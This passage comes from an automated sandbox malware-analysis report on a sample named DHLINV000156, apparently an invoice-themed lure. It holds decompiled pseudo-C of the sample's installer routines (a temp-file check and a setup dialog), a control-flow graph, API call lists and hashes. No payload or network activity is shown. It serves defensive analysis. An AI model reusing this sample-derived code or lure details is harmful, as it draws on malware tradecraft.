                                        0x00406c43
                                        0x00000000
                                        0x00000000
                                        0x00406c49
                                        0x00406c4d
                                        0x00406c50
                                        0x00406c50
                                        0x00406c50
                                        0x00000000
                                        0x00406c50
                                        0x00406ace
                                        0x00406ad0
                                        0x00406ad2
                                        0x00406ad4
                                        0x00406ad7
                                        0x00406ad8
                                        0x00406ada
                                        0x00406adc
                                        0x00406adf
                                        0x00406ae2
                                        0x00406af8
                                        0x00406afd
                                        0x00406b35
                                        0x00406b35
                                        0x00406b39
                                        0x00406b65
                                        0x00406b67
                                        0x00406b6e
                                        0x00406b71
                                        0x00406b74
                                        0x00406b74
                                        0x00406b79
                                        0x00406b79
                                        0x00406b7b
                                        0x00406b7e
                                        0x00406b85
                                        0x00406b88
                                        0x00406bb5
                                        0x00406bb5
                                        0x00406bb8
                                        0x00406bbb
                                        0x00406c2f
                                        0x00406c2f
                                        0x00406c2f
                                        0x00000000
                                        0x00406c2f
                                        0x00406bbd
                                        0x00406bc3
                                        0x00406bc6
                                        0x00406bc9
                                        0x00406bcc
                                        0x00406bcf
                                        0x00406bd2
                                        0x00406bd5
                                        0x00406bd8
                                        0x00406bdb
                                        0x00406bde
                                        0x00406bf7
                                        0x00406bf9
                                        0x00406bfc
                                        0x00406bfd
                                        0x00406c00
                                        0x00406c02
                                        0x00406c05
                                        0x00406c07
                                        0x00406c09
                                        0x00406c0c
                                        0x00406c0e
                                        0x00406c11
                                        0x00406c15
                                        0x00406c17
                                        0x00406c17
                                        0x00406c18
                                        0x00406c1b
                                        0x00406c1e
                                        0x00406be0
                                        0x00406be0
                                        0x00406be8
                                        0x00406bed
                                        0x00406bef
                                        0x00406bf2
                                        0x00406bf2
                                        0x00406c21
                                        0x00406c28
                                        0x00406bb2
                                        0x00406bb2
                                        0x00406bb2
                                        0x00406bb2
                                        0x00000000
                                        0x00406c2a
                                        0x00000000
                                        0x00406c2a
                                        0x00406c28
                                        0x00406b3b
                                        0x00406b3e
                                        0x00406b40
                                        0x00406b43
                                        0x00406b46
                                        0x00406b49
                                        0x00406b4b
                                        0x00406b4e
                                        0x00406b51
                                        0x00406b51
                                        0x00406b54
                                        0x00406b54
                                        0x00406b57
                                        0x00406b5e
                                        0x00406b32
                                        0x00406b32
                                        0x00406b32
                                        0x00406b32
                                        0x00000000
                                        0x00406b60
                                        0x00000000
                                        0x00406b60
                                        0x00406b5e
                                        0x00406ae4
                                        0x00406ae7
                                        0x00406ae9
                                        0x00406aec
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004069d6
                                        0x004069d6
                                        0x004069da
                                        0x00406ea0
                                        0x00000000
                                        0x00406ea0
                                        0x004069e0
                                        0x004069e3
                                        0x004069e6
                                        0x004069e9
                                        0x004069eb
                                        0x004069eb
                                        0x004069eb
                                        0x004069ee
                                        0x004069f1
                                        0x004069f4
                                        0x004069f7
                                        0x004069fa
                                        0x004069fd
                                        0x004069fe
                                        0x00406a00
                                        0x00406a00
                                        0x00406a00
                                        0x00406a03
                                        0x00406a06
                                        0x00406a09
                                        0x00406a0c
                                        0x00406a0c
                                        0x00406a0c
                                        0x00406a0f
                                        0x00000000
                                        0x00000000
                                        0x00406c53
                                        0x00406c53
                                        0x00406c53
                                        0x00406c57
                                        0x00000000
                                        0x00000000
                                        0x00406c5d
                                        0x00406c60
                                        0x00406c63
                                        0x00406c66
                                        0x00406c68
                                        0x00406c68
                                        0x00406c68
                                        0x00406c6b
                                        0x00406c6e
                                        0x00406c71
                                        0x00406c74
                                        0x00406c77
                                        0x00406c7a
                                        0x00406c7b
                                        0x00406c7d
                                        0x00406c7d
                                        0x00406c7d
                                        0x00406c80
                                        0x00406c83
                                        0x00406c86
                                        0x00406c89
                                        0x00406c8c
                                        0x00406c90
                                        0x00406c92
                                        0x00406c95
                                        0x00000000
                                        0x00406c97
                                        0x00000000
                                        0x00406c97
                                        0x00406c95
                                        0x00406eca
                                        0x00000000
                                        0x00000000
                                        0x004064f9

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b42b921e85d89c0e117f5f9f4e0d0c16e752254418a7148ec341c06b29f841c9
                                        • Instruction ID: 4f714145f5a313d6319dbd2ae6a602097e3dd159542c3e152d0bb7460fb66c8d
                                        • Opcode Fuzzy Hash: b42b921e85d89c0e117f5f9f4e0d0c16e752254418a7148ec341c06b29f841c9
                                        • Instruction Fuzzy Hash: 25F17571D00229CBDF28CFA8C8946ADBBB0FF44305F25856ED856BB281D7395A96CF44
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004062DD(CHAR* _a4) {
                                        				void* _t2;
                                        
                                        				_t2 = FindFirstFileA(_a4, 0x421558); // executed
                                        				if(_t2 == 0xffffffff) {
                                        					return 0;
                                        				}
                                        				FindClose(_t2);
                                        				return 0x421558;
                                        			}




                                        0x004062e8
                                        0x004062f1
                                        0x00000000
                                        0x004062fe
                                        0x004062f4
                                        0x00000000

                                        APIs
                                        • FindFirstFileA.KERNELBASE(74D0FA90,00421558,C:\Users\user\AppData\Local\Temp\nsf4536.tmp,00405AA3,C:\Users\user\AppData\Local\Temp\nsf4536.tmp,C:\Users\user\AppData\Local\Temp\nsf4536.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsf4536.tmp,C:\Users\user\AppData\Local\Temp\nsf4536.tmp,74D0FA90,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,74D0FA90,C:\Users\user\AppData\Local\Temp\), ref: 004062E8
                                        • FindClose.KERNEL32(00000000), ref: 004062F4
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\nsf4536.tmp, xrefs: 004062DD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsf4536.tmp
                                        • API String ID: 2295610775-3147736861
                                        • Opcode ID: 78efce08eb58f860d58d9cc4337d862744689776f4b13788d4bc070c197dd51e
                                        • Instruction ID: 9f0851c2fc9ceccd35e24d87c19841e9ead441a619ffea6187f1505ec1ede2b7
                                        • Opcode Fuzzy Hash: 78efce08eb58f860d58d9cc4337d862744689776f4b13788d4bc070c197dd51e
                                        • Instruction Fuzzy Hash: B1D012319090207BC30117386E0C85B7A599B553317228A77F967F12F0C7388C7696E9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 185 403b94-403ba6 186 403ce7-403cf6 185->186 187 403bac-403bb2 185->187 189 403d45-403d5a 186->189 190 403cf8-403d33 GetDlgItem * 2 call 404068 KiUserCallbackDispatcher call 40140b 186->190 187->186 188 403bb8-403bc1 187->188 191 403bc3-403bd0 SetWindowPos 188->191 192 403bd6-403bd9 188->192 194 403d9a-403d9f call 4040b4 189->194 195 403d5c-403d5f 189->195 213 403d38-403d40 190->213 191->192 197 403bf3-403bf9 192->197 198 403bdb-403bed ShowWindow 192->198 203 403da4-403dbf 194->203 200 403d61-403d6c call 401389 195->200 201 403d92-403d94 195->201 204 403c15-403c18 197->204 205 403bfb-403c10 DestroyWindow 197->205 198->197 200->201 216 403d6e-403d8d SendMessageA 200->216 201->194 202 404035 201->202 211 404037-40403e 202->211 209 403dc1-403dc3 call 40140b 203->209 210 403dc8-403dce 203->210 214 403c1a-403c26 SetWindowLongA 204->214 215 403c2b-403c31 204->215 212 404012-404018 205->212 209->210 219 403ff3-40400c DestroyWindow EndDialog 210->219 220 403dd4-403ddf 210->220 212->202 218 40401a-404020 212->218 213->189 214->211 221 403cd4-403ce2 call 4040cf 215->221 222 403c37-403c48 GetDlgItem 215->222 216->211 218->202 224 404022-40402b ShowWindow 218->224 219->212 220->219 225 403de5-403e32 call 405ffc call 404068 * 3 GetDlgItem 220->225 221->211 226 403c67-403c6a 222->226 227 403c4a-403c61 SendMessageA IsWindowEnabled 222->227 224->202 255 403e34-403e39 225->255 256 403e3c-403e78 ShowWindow KiUserCallbackDispatcher call 40408a EnableWindow 225->256 228 403c6c-403c6d 226->228 229 403c6f-403c72 226->229 227->202 227->226 232 403c9d-403ca2 call 404041 228->232 233 403c80-403c85 229->233 234 403c74-403c7a 229->234 232->221 236 403cbb-403cce SendMessageA 233->236 238 403c87-403c8d 233->238 234->236 237 403c7c-403c7e 234->237 236->221 237->232 241 403ca4-403cad call 40140b 238->241 242 403c8f-403c95 call 40140b 238->242 241->221 251 403caf-403cb9 241->251 253 403c9b 242->253 251->253 253->232 255->256 259 403e7a-403e7b 256->259 260 403e7d 256->260 261 403e7f-403ead GetSystemMenu EnableMenuItem SendMessageA 259->261 260->261 262 403ec2 261->262 263 403eaf-403ec0 SendMessageA 261->263 264 403ec8-403f02 call 40409d call 403b75 call 405fda lstrlenA call 405ffc SetWindowTextA call 401389 262->264 263->264 264->203 275 403f08-403f0a 264->275 275->203 276 403f10-403f14 275->276 277 403f33-403f47 DestroyWindow 276->277 278 403f16-403f1c 276->278 277->212 280 403f4d-403f7a CreateDialogParamA 277->280 278->202 279 403f22-403f28 278->279 279->203 281 403f2e 279->281 280->212 282 403f80-403fd7 call 404068 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 280->282 281->202 282->202 287 403fd9-403fec ShowWindow call 4040b4 282->287 289 403ff1 287->289 289->212
                                        C-Code - Quality: 84%
                                        			E00403B94(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                        				struct HWND__* _v32;
                                        				void* _v84;
                                        				void* _v88;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t35;
                                        				signed int _t37;
                                        				signed int _t39;
                                        				struct HWND__* _t49;
                                        				signed int _t68;
                                        				struct HWND__* _t74;
                                        				signed int _t87;
                                        				struct HWND__* _t92;
                                        				signed int _t100;
                                        				int _t104;
                                        				signed int _t116;
                                        				signed int _t117;
                                        				int _t118;
                                        				signed int _t123;
                                        				struct HWND__* _t126;
                                        				struct HWND__* _t127;
                                        				int _t128;
                                        				long _t131;
                                        				int _t133;
                                        				int _t134;
                                        				void* _t135;
                                        				void* _t143;
                                        
                                        				_t116 = _a8;
                                        				if(_t116 == 0x110 || _t116 == 0x408) {
                                        					_t35 = _a12;
                                        					_t126 = _a4;
                                        					__eflags = _t116 - 0x110;
                                        					 *0x41fcf0 = _t35;
                                        					if(_t116 == 0x110) {
                                        						 *0x423708 = _t126;
                                        						 *0x41fd04 = GetDlgItem(_t126, 1);
                                        						_t92 = GetDlgItem(_t126, 2);
                                        						_push(0xffffffff);
                                        						_push(0x1c);
                                        						 *0x41ecd0 = _t92;
                                        						E00404068(_t126);
                                        						SetClassLongA(_t126, 0xfffffff2,  *0x422ee8); // executed
                                        						 *0x422ecc = E0040140B(4);
                                        						_t35 = 1;
                                        						__eflags = 1;
                                        						 *0x41fcf0 = 1;
                                        					}
                                        					_t123 =  *0x4091dc; // 0x0
                                        					_t134 = 0;
                                        					_t131 = (_t123 << 6) +  *0x423740;
                                        					__eflags = _t123;
                                        					if(_t123 < 0) {
                                        						L34:
                                        						E004040B4(0x40b);
                                        						while(1) {
                                        							_t37 =  *0x41fcf0; // 0x1
                                        							 *0x4091dc =  *0x4091dc + _t37;
                                        							_t131 = _t131 + (_t37 << 6);
                                        							_t39 =  *0x4091dc; // 0x0
                                        							__eflags = _t39 -  *0x423744;
                                        							if(_t39 ==  *0x423744) {
                                        								E0040140B(1);
                                        							}
                                        							__eflags =  *0x422ecc - _t134; // 0x0
                                        							if(__eflags != 0) {
                                        								break;
                                        							}
                                        							__eflags =  *0x4091dc -  *0x423744; // 0x0
                                        							if(__eflags >= 0) {
                                        								break;
                                        							}
                                        							_t117 =  *(_t131 + 0x14);
                                        							E00405FFC(_t117, _t126, _t131, 0x42b800,  *((intOrPtr*)(_t131 + 0x24)));
                                        							_push( *((intOrPtr*)(_t131 + 0x20)));
                                        							_push(0xfffffc19);
                                        							E00404068(_t126);
                                        							_push( *((intOrPtr*)(_t131 + 0x1c)));
                                        							_push(0xfffffc1b);
                                        							E00404068(_t126);
                                        							_push( *((intOrPtr*)(_t131 + 0x28)));
                                        							_push(0xfffffc1a);
                                        							E00404068(_t126);
                                        							_t49 = GetDlgItem(_t126, 3);
                                        							__eflags =  *0x4237ac - _t134;
                                        							_v32 = _t49;
                                        							if( *0x4237ac != _t134) {
                                        								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                        								__eflags = _t117;
                                        							}
                                        							ShowWindow(_t49, _t117 & 0x00000008); // executed
                                        							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100); // executed
                                        							E0040408A(_t117 & 0x00000002);
                                        							_t118 = _t117 & 0x00000004;
                                        							EnableWindow( *0x41ecd0, _t118);
                                        							__eflags = _t118 - _t134;
                                        							if(_t118 == _t134) {
                                        								_push(1);
                                        							} else {
                                        								_push(_t134);
                                        							}
                                        							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
                                        							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
                                        							__eflags =  *0x4237ac - _t134;
                                        							if( *0x4237ac == _t134) {
                                        								_push( *0x41fd04);
                                        							} else {
                                        								SendMessageA(_t126, 0x401, 2, _t134);
                                        								_push( *0x41ecd0);
                                        							}
                                        							E0040409D();
                                        							E00405FDA(0x41fd08, E00403B75());
                                        							E00405FFC(0x41fd08, _t126, _t131,  &(0x41fd08[lstrlenA(0x41fd08)]),  *((intOrPtr*)(_t131 + 0x18)));
                                        							SetWindowTextA(_t126, 0x41fd08); // executed
                                        							_push(_t134);
                                        							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
                                        							__eflags = _t68;
                                        							if(_t68 != 0) {
                                        								continue;
                                        							} else {
                                        								__eflags =  *_t131 - _t134;
                                        								if( *_t131 == _t134) {
                                        									continue;
                                        								}
                                        								__eflags =  *(_t131 + 4) - 5;
                                        								if( *(_t131 + 4) != 5) {
                                        									DestroyWindow( *0x422ed8); // executed
                                        									 *0x41f4e0 = _t131;
                                        									__eflags =  *_t131 - _t134;
                                        									if( *_t131 <= _t134) {
                                        										goto L58;
                                        									}
                                        									_t74 = CreateDialogParamA( *0x423700,  *_t131 +  *0x422ee0 & 0x0000ffff, _t126,  *(0x4091e0 +  *(_t131 + 4) * 4), _t131); // executed
                                        									__eflags = _t74 - _t134;
                                        									 *0x422ed8 = _t74;
                                        									if(_t74 == _t134) {
                                        										goto L58;
                                        									}
                                        									_push( *((intOrPtr*)(_t131 + 0x2c)));
                                        									_push(6);
                                        									E00404068(_t74);
                                        									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
                                        									ScreenToClient(_t126, _t135 + 0x10);
                                        									SetWindowPos( *0x422ed8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
                                        									_push(_t134);
                                        									E00401389( *((intOrPtr*)(_t131 + 0xc)));
                                        									__eflags =  *0x422ecc - _t134; // 0x0
                                        									if(__eflags != 0) {
                                        										goto L61;
                                        									}
                                        									ShowWindow( *0x422ed8, 8); // executed
                                        									E004040B4(0x405);
                                        									goto L58;
                                        								}
                                        								__eflags =  *0x4237ac - _t134;
                                        								if( *0x4237ac != _t134) {
                                        									goto L61;
                                        								}
                                        								__eflags =  *0x4237a0 - _t134;
                                        								if( *0x4237a0 != _t134) {
                                        									continue;
                                        								}
                                        								goto L61;
                                        							}
                                        						}
                                        						DestroyWindow( *0x422ed8);
                                        						 *0x423708 = _t134;
                                        						EndDialog(_t126,  *0x41f0d8);
                                        						goto L58;
                                        					} else {
                                        						__eflags = _t35 - 1;
                                        						if(_t35 != 1) {
                                        							L33:
                                        							__eflags =  *_t131 - _t134;
                                        							if( *_t131 == _t134) {
                                        								goto L61;
                                        							}
                                        							goto L34;
                                        						}
                                        						_push(0);
                                        						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
                                        						__eflags = _t87;
                                        						if(_t87 == 0) {
                                        							goto L33;
                                        						}
                                        						SendMessageA( *0x422ed8, 0x40f, 0, 1);
                                        						__eflags =  *0x422ecc - _t134; // 0x0
                                        						return 0 | __eflags == 0x00000000;
                                        					}
                                        				} else {
                                        					_t126 = _a4;
                                        					_t134 = 0;
                                        					if(_t116 == 0x47) {
                                        						SetWindowPos( *0x41fce8, _t126, 0, 0, 0, 0, 0x13);
                                        					}
                                        					if(_t116 == 5) {
                                        						asm("sbb eax, eax");
                                        						ShowWindow( *0x41fce8,  ~(_a12 - 1) & _t116);
                                        					}
                                        					if(_t116 != 0x40d) {
                                        						__eflags = _t116 - 0x11;
                                        						if(_t116 != 0x11) {
                                        							__eflags = _t116 - 0x111;
                                        							if(_t116 != 0x111) {
                                        								L26:
                                        								return E004040CF(_t116, _a12, _a16);
                                        							}
                                        							_t133 = _a12 & 0x0000ffff;
                                        							_t127 = GetDlgItem(_t126, _t133);
                                        							__eflags = _t127 - _t134;
                                        							if(_t127 == _t134) {
                                        								L13:
                                        								__eflags = _t133 - 1;
                                        								if(_t133 != 1) {
                                        									__eflags = _t133 - 3;
                                        									if(_t133 != 3) {
                                        										_t128 = 2;
                                        										__eflags = _t133 - _t128;
                                        										if(_t133 != _t128) {
                                        											L25:
                                        											SendMessageA( *0x422ed8, 0x111, _a12, _a16);
                                        											goto L26;
                                        										}
                                        										__eflags =  *0x4237ac - _t134;
                                        										if( *0x4237ac == _t134) {
                                        											_t100 = E0040140B(3);
                                        											__eflags = _t100;
                                        											if(_t100 != 0) {
                                        												goto L26;
                                        											}
                                        											 *0x41f0d8 = 1;
                                        											L21:
                                        											_push(0x78);
                                        											L22:
                                        											E00404041();
                                        											goto L26;
                                        										}
                                        										E0040140B(_t128);
                                        										 *0x41f0d8 = _t128;
                                        										goto L21;
                                        									}
                                        									__eflags =  *0x4091dc - _t134; // 0x0
                                        									if(__eflags <= 0) {
                                        										goto L25;
                                        									}
                                        									_push(0xffffffff);
                                        									goto L22;
                                        								}
                                        								_push(_t133);
                                        								goto L22;
                                        							}
                                        							SendMessageA(_t127, 0xf3, _t134, _t134);
                                        							_t104 = IsWindowEnabled(_t127);
                                        							__eflags = _t104;
                                        							if(_t104 == 0) {
                                        								goto L61;
                                        							}
                                        							goto L13;
                                        						}
                                        						SetWindowLongA(_t126, _t134, _t134);
                                        						return 1;
                                        					} else {
                                        						DestroyWindow( *0x422ed8);
                                        						 *0x422ed8 = _a12;
                                        						L58:
                                        						if( *0x420d08 == _t134) {
                                        							_t143 =  *0x422ed8 - _t134; // 0x103f2
                                        							if(_t143 != 0) {
                                        								ShowWindow(_t126, 0xa); // executed
                                        								 *0x420d08 = 1;
                                        							}
                                        						}
                                        						L61:
                                        						return 0;
                                        					}
                                        				}
                                        			}































                                        0x00403b9d
                                        0x00403ba6
                                        0x00403ce7
                                        0x00403ceb
                                        0x00403cef
                                        0x00403cf1
                                        0x00403cf6
                                        0x00403d01
                                        0x00403d0c
                                        0x00403d11
                                        0x00403d13
                                        0x00403d15
                                        0x00403d18
                                        0x00403d1d
                                        0x00403d2b
                                        0x00403d38
                                        0x00403d3f
                                        0x00403d3f
                                        0x00403d40
                                        0x00403d40
                                        0x00403d45
                                        0x00403d4b
                                        0x00403d52
                                        0x00403d58
                                        0x00403d5a
                                        0x00403d9a
                                        0x00403d9f
                                        0x00403da4
                                        0x00403da4
                                        0x00403da9
                                        0x00403db2
                                        0x00403db4
                                        0x00403db9
                                        0x00403dbf
                                        0x00403dc3
                                        0x00403dc3
                                        0x00403dc8
                                        0x00403dce
                                        0x00000000
                                        0x00000000
                                        0x00403dd9
                                        0x00403ddf
                                        0x00000000
                                        0x00000000
                                        0x00403de8
                                        0x00403df0
                                        0x00403df5
                                        0x00403df8
                                        0x00403dfe
                                        0x00403e03
                                        0x00403e06
                                        0x00403e0c
                                        0x00403e11
                                        0x00403e14
                                        0x00403e1a
                                        0x00403e22
                                        0x00403e28
                                        0x00403e2e
                                        0x00403e32
                                        0x00403e39
                                        0x00403e39
                                        0x00403e39
                                        0x00403e43
                                        0x00403e55
                                        0x00403e61
                                        0x00403e66
                                        0x00403e70
                                        0x00403e76
                                        0x00403e78
                                        0x00403e7d
                                        0x00403e7a
                                        0x00403e7a
                                        0x00403e7a
                                        0x00403e8d
                                        0x00403ea5
                                        0x00403ea7
                                        0x00403ead
                                        0x00403ec2
                                        0x00403eaf
                                        0x00403eb8
                                        0x00403eba
                                        0x00403eba
                                        0x00403ec8
                                        0x00403ed9
                                        0x00403eea
                                        0x00403ef1
                                        0x00403ef7
                                        0x00403efb
                                        0x00403f00
                                        0x00403f02
                                        0x00000000
                                        0x00403f08
                                        0x00403f08
                                        0x00403f0a
                                        0x00000000
                                        0x00000000
                                        0x00403f10
                                        0x00403f14
                                        0x00403f39
                                        0x00403f3f
                                        0x00403f45
                                        0x00403f47
                                        0x00000000
                                        0x00000000
                                        0x00403f6d
                                        0x00403f73
                                        0x00403f75
                                        0x00403f7a
                                        0x00000000
                                        0x00000000
                                        0x00403f80
                                        0x00403f83
                                        0x00403f86
                                        0x00403f9d
                                        0x00403fa9
                                        0x00403fc2
                                        0x00403fc8
                                        0x00403fcc
                                        0x00403fd1
                                        0x00403fd7
                                        0x00000000
                                        0x00000000
                                        0x00403fe1
                                        0x00403fec
                                        0x00000000
                                        0x00403fec
                                        0x00403f16
                                        0x00403f1c
                                        0x00000000
                                        0x00000000
                                        0x00403f22
                                        0x00403f28
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00403f2e
                                        0x00403f02
                                        0x00403ff9
                                        0x00404005
                                        0x0040400c
                                        0x00000000
                                        0x00403d5c
                                        0x00403d5c
                                        0x00403d5f
                                        0x00403d92
                                        0x00403d92
                                        0x00403d94
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00403d94
                                        0x00403d61
                                        0x00403d65
                                        0x00403d6a
                                        0x00403d6c
                                        0x00000000
                                        0x00000000
                                        0x00403d7c
                                        0x00403d84
                                        0x00000000
                                        0x00403d8a
                                        0x00403bb8
                                        0x00403bb8
                                        0x00403bbc
                                        0x00403bc1
                                        0x00403bd0
                                        0x00403bd0
                                        0x00403bd9
                                        0x00403be2
                                        0x00403bed
                                        0x00403bed
                                        0x00403bf9
                                        0x00403c15
                                        0x00403c18
                                        0x00403c2b
                                        0x00403c31
                                        0x00403cd4
                                        0x00000000
                                        0x00403cdd
                                        0x00403c37
                                        0x00403c44
                                        0x00403c46
                                        0x00403c48
                                        0x00403c67
                                        0x00403c67
                                        0x00403c6a
                                        0x00403c6f
                                        0x00403c72
                                        0x00403c82
                                        0x00403c83
                                        0x00403c85
                                        0x00403cbb
                                        0x00403cce
                                        0x00000000
                                        0x00403cce
                                        0x00403c87
                                        0x00403c8d
                                        0x00403ca6
                                        0x00403cab
                                        0x00403cad
                                        0x00000000
                                        0x00000000
                                        0x00403caf
                                        0x00403c9b
                                        0x00403c9b
                                        0x00403c9d
                                        0x00403c9d
                                        0x00000000
                                        0x00403c9d
                                        0x00403c90
                                        0x00403c95
                                        0x00000000
                                        0x00403c95
                                        0x00403c74
                                        0x00403c7a
                                        0x00000000
                                        0x00000000
                                        0x00403c7c
                                        0x00000000
                                        0x00403c7c
                                        0x00403c6c
                                        0x00000000
                                        0x00403c6c
                                        0x00403c52
                                        0x00403c59
                                        0x00403c5f
                                        0x00403c61
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00403c61
                                        0x00403c1d
                                        0x00000000
                                        0x00403bfb
                                        0x00403c01
                                        0x00403c0b
                                        0x00404012
                                        0x00404018
                                        0x0040401a
                                        0x00404020
                                        0x00404025
                                        0x0040402b
                                        0x0040402b
                                        0x00404020
                                        0x00404035
                                        0x00000000
                                        0x00404035
                                        0x00403bf9

                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BD0
                                        • ShowWindow.USER32(?), ref: 00403BED
                                        • DestroyWindow.USER32 ref: 00403C01
                                        • SetWindowLongA.USER32 ref: 00403C1D
                                        • GetDlgItem.USER32 ref: 00403C3E
                                        • SendMessageA.USER32 ref: 00403C52
                                        • IsWindowEnabled.USER32(00000000), ref: 00403C59
                                        • GetDlgItem.USER32 ref: 00403D07
                                        • GetDlgItem.USER32 ref: 00403D11
                                        • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403D2B
                                        • SendMessageA.USER32 ref: 00403D7C
                                        • GetDlgItem.USER32 ref: 00403E22
                                        • ShowWindow.USER32(00000000,?), ref: 00403E43
                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E55
                                        • EnableWindow.USER32(?,?), ref: 00403E70
                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E86
                                        • EnableMenuItem.USER32 ref: 00403E8D
                                        • SendMessageA.USER32 ref: 00403EA5
                                        • SendMessageA.USER32 ref: 00403EB8
                                        • lstrlenA.KERNEL32(Sepad149: Installing,?,Sepad149: Installing,00000000), ref: 00403EE2
                                        • SetWindowTextA.USER32(?,Sepad149: Installing), ref: 00403EF1
                                        • ShowWindow.USER32(?,0000000A), ref: 00404025
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: Window$Item$MessageSend$Show$CallbackDispatcherEnableMenuUser$DestroyEnabledLongSystemTextlstrlen
                                        • String ID: Sepad149: Installing
                                        • API String ID: 3906175533-2190826614
                                        • Opcode ID: e57483be0e8f0953cc8724a3e8c8ea21599a840bb85b0af5ee6d9011d8646a3c
                                        • Instruction ID: ba3e3afbb1df49eb3663f2526bbc67ab17a8ece20d2805bf2467eb782e73bce3
                                        • Opcode Fuzzy Hash: e57483be0e8f0953cc8724a3e8c8ea21599a840bb85b0af5ee6d9011d8646a3c
                                        • Instruction Fuzzy Hash: FEC1AEB2604205BBDB206F61ED49D2B7A6CFB85706F40443EF641B11F1C779A942EB2E
                                        Uniqueness

